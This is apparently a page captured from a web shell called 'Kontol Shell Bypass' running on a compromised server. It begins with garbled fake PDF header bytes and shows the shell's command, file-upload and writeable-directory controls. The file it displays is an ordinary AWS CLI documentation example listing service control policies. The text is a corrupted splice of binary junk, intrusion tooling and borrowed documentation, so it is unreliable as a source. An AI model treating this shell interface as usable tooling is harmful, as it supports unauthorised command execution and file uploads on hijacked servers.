%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /usr/share/doc/awscli/examples/organizations/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : //usr/share/doc/awscli/examples/organizations/list-policies-for-target.rst
**To retrieve a list of the SCPs attached directly to an account**

The following example shows how to get a list of all service control policies (SCPs), as specified by the Filter parameter, that are directly attached to an account: ::

	aws organizations list-policies-for-target --filter SERVICE_CONTROL_POLICY --target-id 444444444444
  
The output includes a list of policy structures with summary information about the policies. The list does not include policies that apply to the account because of inheritance from its location in an OU hierarchy: ::

	{
		"Policies": [
			{
				"Type": "SERVICE_CONTROL_POLICY",
				"Name": "AllowAllEC2Actions",
				"AwsManaged", false,
				"Id": "p-examplepolicyid222",
				"Arn": "arn:aws:organizations::o-exampleorgid:policy/service_control_policy/p-examplepolicyid222",
				"Description": "Enables account admins to delegate permissions for any EC2 actions to users and roles in their accounts."
			}
		]
	}

Kontol Shell Bypass